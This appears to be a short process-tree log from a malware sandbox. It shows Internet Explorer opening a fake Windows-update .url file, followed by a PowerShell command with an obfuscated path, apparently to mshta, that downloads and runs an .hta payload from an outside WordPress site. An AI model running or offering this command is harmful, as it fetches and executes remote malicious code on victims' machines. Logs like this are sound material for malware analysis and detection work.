iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\en-win-upd(localchr).url
3064iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3064 CREDAT:145409
2160powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" \W*\\\\*2\\\m*h*a*e ('http'+'s://winetourism.co.za/wp-content/uploads/temp/importance-x.'+'hta')
2528